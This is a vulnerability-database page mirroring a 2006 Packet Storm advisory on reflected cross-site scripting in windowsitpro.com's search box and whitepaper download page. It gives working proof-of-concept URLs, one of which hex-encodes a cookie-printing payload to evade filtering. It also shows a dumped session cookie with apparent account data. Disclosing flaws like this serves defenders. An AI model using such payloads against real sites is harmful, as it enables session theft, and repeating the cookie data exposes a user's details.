Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

windowsitpro.txt

🗓️ 21 Jun 2006 00:00:00Reported by LunyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Windowsitpro security document affected by XSS vulnerability and cookie disclosure in search input box and downloading whitepapers with PoC examples and screenshots

Code
`Windowsitpro.com  
  
Homepage:  
http://www.windowsitpro.com  
  
Effected files:  
Search input box  
Downloading whitepapers  
  
Search input box xss vuln with cookie disclosure:  
  
We convert our javascript to hex format so we don't recieve the default "Your request cannot be processed as this time" error message. For PoC, log in and put this is nouy browser bar:  
  
http://www.windowsitpro.com/search/index.cfm?action=search&qs=">">">'><IMG%20SRC=%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%6529><""><'<"=undefined&advanced=keywords:"training%20and%20certification"&site=training  
  
And our cookie is:  
  
RMID=429d246a448e36f0; T3CK=TANT%3D1%7CTANO%3D0; RMFD=011Fq067O106y9K;__utma=156530109.941326897.1150171321.1150171321.1150171321.1; __utmb=156530109; __utmc=156530109; __utmz=156530109.1150171321.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); WINSESSION=luny666%3Bluny%40tempinbox%2Ecom%3Bdickens%3Bcider; WINDOWS_REFERERPOP; CP=*; ROADBLOCK0=1; PENTONUUID=CB9951ED%2D1279%2D906B%2DAC2C63B1889B05EE; PENTONPROFILE=C%22%3AS%23PLT%3C%5D%5D%2A%3EV3K%291%20%5F%2FR%3C%3A7R%3B%2A%40%2F%2EN%3AAD%2D%2DF%2B6%28%22%5D%26%24%3DI%28%20%0A; PUBLIST; ACCESSLEVELIDLIST=136%2C136  
  
Screenshots:   
http://www.youfucktard.com/xsp/winitpro1.jpg  
http://www.youfucktard.com/xsp/winitpro2.jpg  
---------------------------------------  
  
Downloading whitepapers XSS vuln with cookie disclosure:  
  
In order to do this xss example, we do just like the above example, except we use malformed image tags.   
  
For PoC try:  
http://www.windowsitpro.com/Whitepapers/index.cfm?fuseaction=showwp&wpid=5744e2b0-fa1b-403d-b471-0d5d12d2db02&code=">">">">'>'><IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>"><"<"<"<"  
  
Screenshot:  
http://www.youfucktard.com/xsp/winitpro3.jpg  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
windowsitproxss vulnerabilitycookie disclosuresearch inputdownloading whitepaperspoc examplesscreenshotsmalformed image tags
27